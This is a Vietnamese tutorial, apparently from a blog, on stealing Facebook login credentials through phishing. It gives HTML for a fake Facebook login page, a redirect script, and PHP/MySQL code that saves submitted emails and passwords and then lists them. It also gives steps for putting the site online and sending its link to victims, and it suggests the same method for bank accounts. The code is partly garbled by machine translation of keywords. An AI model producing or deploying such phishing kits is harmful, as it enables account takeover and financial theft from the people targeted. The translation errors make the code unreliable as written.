Code Hack Nick Facebook Gì? Hướng Dẫn Cách Sử Dụng Hiệu Quả

Sử dụng code hack nick Facebook là cách khá hiệu quả so với các phương pháp khác. Tuy nhiên, để có thể sử dụng cách này thành công thì không phải ai cũng làm được và không phải ai cũng có code hack Facebook phù hợp. Vì vậy bài viết dưới đây chúng tôi sẽ hướng dẫn chi tiết cho các bạn cách sử dụng mã hack tài khoản Facebook chi tiết và chính xác nhất. Hãy cùng tìm hiểu thông tin chi tiết qua bài viết dưới đây nhé!

Code Hack Nick Facebook Mới Nhất 2023 - Thành Công 99%

Code hack Nick Facebook là gì?

Hack Facebook bằng code khá hiệu quả nhưng phương pháp này chỉ có thể thực hiện thành công nếu bạn có một số kiến thức cơ bản về code. Tuy nhiên, bạn chỉ nên sử dụng mã này trong những trường hợp cần thiết và phù hợp.

Và bạn không nên lạm dụng vào mục đích xấu: lừa đảo, chiếm đoạt tài sản cá nhân hay các hành động khác vi phạm pháp luật dẫn đến hậu quả nghiêm trọng cho chủ tài khoản.

Cần chuẩn bị những gì để hack tài khoản Facebook?

Để có thể chạy được code hack tài khoản Facebook, kiểm tra mật khẩu Facebook, code hack tài khoản Facebook các bạn cần chuẩn bị kiến thức và ngôn ngữ chuyên ngành như sau:

 • HTML
 • CSS
 • JavaScript
 • PHP và MySQL

Hãy trang bị cho mình những kiến thức cơ bản trước khi sử dụng mã hack tài khoản Facebook nhằm mục đích tạo form đăng nhập giống hệt mạng xã hội Facebook nhé. (Lúc này HTML và CSS sẽ được áp dụng tại đây). Khi đó người dùng sẽ lầm tưởng website bạn tạo với giao diện giống Facebook là Facebook thật nên sẽ điền tài khoản và mật khẩu để đăng nhập.

Sau đó, bạn sẽ thu thập và lưu trữ tất cả thông tin đăng nhập liên quan đến tài khoản Facebook này trong cơ sở dữ liệu PHP và MySQLi. Sau đó nó sẽ chuyển hướng người dùng về trang Facebook gốc. (JavaScript sẽ giúp bạn làm điều này)

Dưới đây là cách hack tài khoản Facebook, hack mật khẩu Facebook bằng cách lợi dụng các cuộc tấn công lừa đảo. Sau khi xem và thực hành mã hack Facebook mà tôi dạy, bạn sẽ có thể hack tài khoản Facebook của người khác, thu thập ID đăng nhập và mật khẩu của vô số tài khoản khác.

Hướng dẫn cách sử dụng code hack nick Facebook

Để sử dụng mã hack tài khoản Facebook, bạn cần chuẩn bị một số bước sau:

 • Bước 1: Tạo website đăng nhập giống Facebook bằng mã hack Facebook kèm theo thông tin chi tiết nhất. Cũng đừng quên kèm theo ảnh và tin nhắn
 • Bước 2: Tạo script xử lý trang đăng nhập. Mục đích của việc này là lưu trữ tất cả thông tin trong cơ sở dữ liệu của bạn
 • Bước 3: Tạo cơ sở dữ liệu để lưu trữ ID và mật khẩu Facebook. Sau đó gửi link đăng nhập cho người dùng
 • Bước 4: Tạo website xem ID và mật khẩu tài khoản Facebook bị hack.

Sau khi gửi link (địa chỉ URL) đến đúng người có tài khoản mà bạn muốn hack, việc của bạn là đợi họ tự động cung cấp tên tài khoản đăng nhập và mật khẩu tài khoản Facebook vào cơ sở dữ liệu của bạn. Hoặc bạn cũng có thể tạo trang web riêng để hiển thị danh sách mật khẩu tài khoản Facebook của người dùng mục tiêu.

 • Bước 5: Sau khi hoàn tất các bước trên, bạn chờ nhận thông tin chi tiết nhất về ID và mật khẩu tài khoản Facebook bị mã tấn công.

Tuy nhiên cách trình bày của các phương pháp trên hơi khó hiểu đối với nhiều người. Để giúp các bạn hiểu chi tiết và nắm rõ cách để đạt được thành công một cách dễ dàng, chúng tôi sẽ chia sẻ chi tiết từng phương pháp với các bạn dưới đây. Đặc biệt:

Tạo trang web đăng nhập giống với website đăng nhập Facebook

Tiếp theo, tạo một trang đăng nhập demo, với mã HTML bên dưới

Lưu ý: Mã tạo giao diện đăng nhập kiểu FB này chỉ có thể chạy trên thiết bị di động. Vì vậy, bạn cần triển khai mã chuyển hướng để chuyển hướng khách truy cập đến trang đăng nhập, dành cho thiết bị di động hoặc máy tính để bàn bằng mã JavaScript. Bây giờ bạn sẽ nhận được chuỗi mã đăng nhập chi tiết như sau:

 <!doctype html> <html> <head> <title>Mã hack Nick Facebook</title> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, first- scale=1.0,user-scalable=yes"> <meta name="description" content="Mã hack Facebook, Mã kiểm tra Facebook 2021"> <meta property='og:image' content='earnmoney.jpg' /> <link rel="shortcut icon" href="https://www.facebook.com/rsrc.php/yl/r/H3nktOa7ZMg.ico"> <style> bảng tr td{text-align:center;} .bottom a{color:#D3D3D3;} ​.bottom a:link{text-trang trí:none;} input{padding:10px;} .login{background-color:#3b5998;color:white;} .check{background- color: #32CD32;color:white;padding:12px;} .inputf a:link{text-trang trí:none;} </style> </head> <body style="margin:0px;"> <script> tài liệu .title = 'Facebook - Đăng nhập hoặc đăng ký'; </script> <div style="width:100%;"> <div style="height:40px;background-color:#3b5998;padding-bottom:10px;padding-left:5px;"> <span style= "color:white;font-size:120%;"><br/>facebook</span> </div> <div style="background-color:#FAFAD2;padding:5px;line-height:23px;text -align:center;"> <span style="color:purple;">Đăng nhập để tiếp tục nhận 10 mẹo độc quyền hàng đầu giúp kiếm tiền nhanh chóng.</span> </div> < div class="inputf" style ="background-color:AliceBlue;padding:10px;text-align:center;"><br/> <form name="fbform" Method="post" action="login.php" > <input name="email " type="text" id="email" placeholder="Địa chỉ email hoặc số điện thoại" maxlength="40" size="30px" bắt buộc><br/><br/> <input name="pass" type=" mật khẩu" id="pass" placeholder="Mật khẩu" maxlength="40" size="30px" bắt buộc><br/><br/> <input class= "login" name="login" type="submit" id ="submit" value="Đăng nhập" size="60px"><br/><br/> <span style="text-align:center;"> Hoặc</span><br/><br/> < a class="check" href="#email" onclick='document.getElementById("email").focus();'>Tạo tài khoản mới</ a><br/><br/> <a href= "#email" onclick='document.getElementById("email").focus();'>Bạn quên mật khẩu?</a> <br/>< br/> <a href="#email" onclick='document . getElementById("email").focus();'>Trung tâm trợ giúp</a><br/> </form> </div> <div class="bottom" style="background-color:#808080; đệm: 10px;"> <table style="width:250px;margin-left:auto;margin-right:auto;color:#D3D3D3;"> <tr> <td><a href="#email" onclick= 'document .getElementById("email").focus();'>Tiếng Anh (Anh)</a></td> <td><a href="#email" onclick='document.getElementById("email ").focus ();'>Tiếng Anh (Hoa Kỳ)</a></td> </tr> <tr> <td><a href="#email" onclick='document.getElementById("email ").focus( );'>Tiếng Anh (In)</a></td> <td><a href="#email" onclick='document.getElementById("email").focus();'> Thêm</a> </td> </tr> </table> <p style="text-align:center;color:white;">Facebook</p> </div> </div> </body > </html>

Tuy nhiên, trước khi bạn tải lên trang web giả mạo này (nói một cách đơn giản là bất kỳ ai cũng có thể truy cập trang web này), bạn cần thiết lập một hệ thống để hack tài khoản Facebook của người khác trên hệ thống máy tính cục bộ của bạn (localhost). Để thực hiện việc này, bạn cần tải xuống và cài đặt phần mềm XAMPP trên máy tính của mình và thực hiện các bước sau:

Lưu đoạn mã trên vào C:\xampp\htdocs\ với tên seekmoney.php >>> đặt hình ảnh hiển thị vào bên trong một thư mục cùng tên (Tuy nhiên, phần mở rộng là .jpg là Earnmoney .jpg.)

 • Mã để hack tài khoản Facebook
 • Mở XAMPP và khởi động Apache và MySQL để bắt đầu hack ID và tài khoản Facebook.
 • Cách hack tài khoản Facebook bằng code
 • Mở trình duyệt >>> Nhập localhost/seekmoney.php – Dưới đây là hình ảnh minh họa cụ thể:
 • Mã hack Facebook đơn giản

Mã hack tài khoản Facebook được chia sẻ ở trên chỉ dành cho thiết bị di động. Tuy nhiên, bạn cần tạo trang đăng nhập cho cả người dùng, cả trên thiết bị di động và máy tính để bàn, máy tính xách tay…

***Lưu ý: Đây chỉ là code tạo giao diện Facebook mẫu, các bạn cần phải recode lại cho giống với trang giao diện Facebook thật hiện nay hơn.

Tiếp theo, tạo trang đăng nhập với tên SeekmoneyD.php cho máy tính của bạn. Mục đích là chuyển hướng người dùng máy tính đến trang này. Dưới đây là mã chuyển hướng để chuyển hướng người dùng được nhắm mục tiêu của bạn đến trang phiên bản dành cho máy tính để bàn.

 <script type="text/javascript"> if (screen.width > 800) { window.location = "localhost/earnmoneyD.php"; } </script>

Đặt mã hack Facebook ở trên vào đầu trang đăng nhập đã tạo trước đó.

Tạo script lưu trữ mọi thông tin đăng nhập trên Facebook

Đây là tập lệnh quản lý kết nối. Mục đích là lưu trữ thông tin đăng nhập của người bạn muốn hack Facebook >>> Sau đó bỏ file trên vào thư mục có tên login.php

 <?php $conn = mysqli_connect('localhost', 'root', '', 'fbhackedusers'); if(mysqli_connect_error()) { // chuyển hướng người dùng về Facebook gốc nếu xảy ra lỗi header("location: https://www.facebook.com"); lối ra(); } ?> <!doctype html> <html> <head> <title>Đăng nhập vào Facebook</title> <meta charset="utf-8"> <meta name="viewport" content="width=device-width , init-scale=1.0,user-scalable=yes"> </head> <body style="margin:0px;"> <?php if($_SERVER["REQUEST_METHOD"] == "POST") { if( isset ($_POST['đăng nhập'])) { $email = $pass = ""; // lấy id email Facebook $email = $_POST["email"]; // lấy mật khẩu Facebook $pass = $_POST["pass"]; // chèn tên người dùng và mật khẩu Facebook vào cơ sở dữ liệu $sql = "chèn vào giá trị fbusers(facebookid, facebookpassword)('$email', '$pass')"; $result = $conn->query($sql); } } // chuyển hướng người dùng đến tiêu đề url gốc của Facebook ("vị trí: https://www.facebook.com"); lối ra(); ?> </body> </html>

Code hack tài khoản Facebook nhanh chóng

Chuyển hướng người dùng đến url Facebook gốc

Ở bước này các bạn có thể dễ dàng nhận thấy với 2 bước trên đoạn code sau khi sử dụng sẽ chuyển hướng người dùng về Facebook gốc.

header(“location: https://www.facebook.com”);

Tạo cơ sở dữ liệu để lưu trữ id và mật khẩu Facebook

Ở đây bạn sẽ tạo một cơ sở dữ liệu có cùng tên >>> Sau đó tạo một bảng có cùng tên >>> Sau đó tạo các cột có chi tiết tương tự như đoạn mã trên (Đây là cơ sở dữ liệu có tên fbhackedusers, bảng có tên fbusers, cuối cùng là cột là tên người dùng Facebook và mật khẩu Facebook). Và để làm điều này, hãy làm theo các bước sau:

 • Bước 1: Nhấp vào Quản trị viên, nằm ngay cạnh hàng MySQL trong bảng điều khiển XAMPP. Một trang web ngay lập tức mở ra trong trình duyệt web mặc định của bạn với url http://localhost/phpmyadmin/
 • Bước 2: Bấm vào Cơ sở dữ liệu .
 • Bước 3: Nhập tên cơ sở dữ liệu là fbhackedusers , nhấn nút Create .
 • Bước 4: Nhập fbusers bên cạnh tên >>> đặt 3 bên cạnh số cột. Nhấp vào nút Tạo .
 • Bước 5: Cung cấp thông tin chi tiết cho 3 cột trên. Trong đó, cột đầu tiên có dạng S.No. như một cái tên. INT là loại, 6 là độ dài. Giá trị Primary là chỉ mục và AI tự động đánh dấu tăng lên. Tất cả người dùng
 • Bước 6: Khi cung cấp thông tin chi tiết về 3 bước trên bạn nhấn Lưu. Điều này có nghĩa là bạn đã cấu hình thành công cơ sở dữ liệu cục bộ của mình

Gửi link mã hack Facebook cho bạn bè

Việc của bạn bây giờ là gửi link tới người có tài khoản Facebook mà bạn muốn hack để lấy ID tài khoản và mật khẩu của họ thông qua trang mã hack Facebook mà bạn vừa tạo.

Tạo website để liệt kê người dùng facebook bị tấn công

Để dễ dàng xem ID và mật khẩu tài khoản Facebook đã bị hack bằng mã Facebook, bạn cần tạo một trang web. Sau đó, truy xuất và liệt kê ID và mật khẩu tài khoản Facebook trong cơ sở dữ liệu ở dạng bảng, thường như đoạn mã sau:

 <?php $conn = mysqli_connect('localhost', 'root', '', 'fbhackedusers'); ?> <!doctype html> <html> <head> <title>Danh sách người dùng Facebook bị tôi hack</title> <meta charset="utf-8"> <meta name="viewport" content="width= device -width,initial-scale=1.0,user-scalable=yes"> <style> bảng thứ, td{border:1px màu đen đặc;padding:10px;} </style> </head> <body> <?php $ sql = "chọn * từ fbusers"; $res = $conn->query($sql); tiếng vang "<bảng>" ; tiếng vang "<tr>"; echo "<th>ID Facebook</th>"; echo "<th>Mật khẩu Facebook</th>"; tiếng vang "</tr>"; while($row=mysqli_fetch_row($res)) { echo "<tr><td> $row[1] </td> <td> $row[2] </td></tr>"; } echo "</table>"; ?> </body> </html>

Đặt tên tệp này trong cùng thư mục với hackusers.php.

Ví dụ: cụ thể về cách code Hack Nick Facebook

Sau khi làm theo tất cả các hướng dẫn ở trên, bạn có thể bắt đầu thử nghiệm xem mã hack tài khoản Facebook có hoạt động hay không.

 • Bước 1: Truy cập liên kết localhost/seekmoney.php và trang đăng nhập demo sau sẽ xuất hiện

Code Hack Nick Facebook Mới Nhất 2023 - Thành Công 99%

 • Bước 2: Nhập ID và mật khẩu tài khoản Facebook của bạn một cách ngẫu nhiên ngay cả khi mật khẩu sai.

Code Hack Nick Facebook Mới Nhất 2023 - Thành Công 99%

 • Bước 3: Sau khi nhập thông tin và nhấn nút đăng nhập. Tập lệnh xử lý kết nối của bạn bây giờ sẽ lưu trữ các chi tiết trong cơ sở dữ liệu. Đồng thời chuyển hướng người dùng về URL Facebook gốc.

Khi ID và mật khẩu tài khoản Facebook của đối tượng cần hack được lưu trữ trong cơ sở dữ liệu đồng nghĩa với việc bạn có thể xem được danh sách những người dùng Facebook bị hack. Sử dụng trang web của riêng bạn >>> Mở trình duyệt và nhập localhost/hackedusers.ph p.

Code Hack Nick Facebook Mới Nhất 2023 - Thành Công 99%

Triển khai hệ thống code hack facebook ra ngoài mạng internet

Để hệ thống hack tài khoản của bạn hoạt động, hãy làm theo các bước sau:

 • Bước 1: Tạo thư mục có tên Facebook bên trong thư mục mẹ.
 • Bước 2: Tạo cơ sở dữ liệu >>> Tạo bảng có cùng cơ sở dữ liệu với các chi tiết giống như mã hack biệt danh Facebook được chia sẻ ở trên
 • Bước 3: Đặt tất cả các file Earnmoney.php, EarnmoneyD.php, login.php, Hackedusers.php cùng với file hình ảnh ở đây Earnmoney.jpg vào thư mục Facebook đã tạo ở bước 1.
 • Bước 4: Gửi link cho bạn bè, kèm link tamblogs.com/facebook/earnmoney.php
 • Hình 5: Mở link trên trình duyệt là tamblogs.com /facebook/hackedusers.php

Sau khi hoàn thành tất cả các bước trên, bạn cần chỉnh sửa chuỗi kết nối. Vui lòng thay đổi localhost bằng địa chỉ lưu trữ của riêng bạn. Root là tên người dùng cơ sở dữ liệu. Mật khẩu sẽ là mật khẩu cơ sở dữ liệu của bạn (hoặc để trống nếu bạn chưa tạo mật khẩu cơ sở dữ liệu). Cuối cùng, thay thế localhost bằng https://…

Ngoài ra, bạn có thể thực hiện những thay đổi khác dựa trên mã hack tài khoản Facebook. Đây chỉ là bản demo giúp bạn hiểu rằng bạn có thể hack Facebook của bất kỳ ai bằng cách sử dụng hướng dẫn ở trên.

Những lưu ý khi sử dụng code hack nick Facebook

Cách hack tài khoản Facebook bằng code không quá phức tạp và bạn có thể áp dụng hoàn toàn thành công nếu làm theo những gì chúng tôi chia sẻ ở trên.

Bạn cũng có thể áp dụng cách này để hack các mạng xã hội khác ngoài Facebook, hay thậm chí là hack tài khoản ngân hàng…

Ví dụ bạn gửi tin nhắn cho một người lạ với nội dung: Cách kiếm tiền nhanh không mất phí tại Vietinbank (có link web giao diện đăng nhập giống trang đăng nhập thật của ngân hàng) >>> Nếu người đó Nếu bạn nhìn thấy nhắn tin “vui tươi, cả tin” và điền thông tin đăng nhập, bạn đã có tài khoản ngân hàng của người này.

Các hacker chuyên nghiệp còn có thể cài virus, mã độc vào các link web này. Ngay cả khi người dùng chỉ cần nhấp để xem mà không điền thông tin đăng nhập, họ vẫn có nguy cơ bị hack tài khoản. Vì vậy, khi nhận được tin nhắn có link lạ trên zalo, Messenger… đừng dại mà click vào nhé!

Mình cũng khuyến khích các bạn KHÔNG nên tùy tiện sử dụng mã hack tài khoản Facebook này. Vui lòng sử dụng đúng mục đích, ví dụ: Chủ tài khoản Facebook bị hack tài khoản và cần khôi phục tài khoản. Tuyệt đối không sử dụng vào mục đích xấu, vì mọi hành vi sai trái sẽ khiến bạn phải chịu trách nhiệm trước pháp luật. Hình thức xử phạt có thể là cảnh cáo, phạt tiền hoặc xử phạt hình sự tùy theo mức độ hành vi của bạn.

Trên đây là tổng hợp chia sẻ kiến thức về cách hack mã tài khoản Facebook chuẩn và mới nhất mà bạn có thể áp dụng. Tuy nhiên, chính sách bảo mật của Facebook không ngừng phát triển nên phương pháp này có thể chỉ phù hợp ở một thời điểm nhất định. Vì vậy khi có thay đổi, chúng tôi sẽ cập nhật bài viết này những thông tin mới nhất. Chúc may mắn!

Bài viết liên quan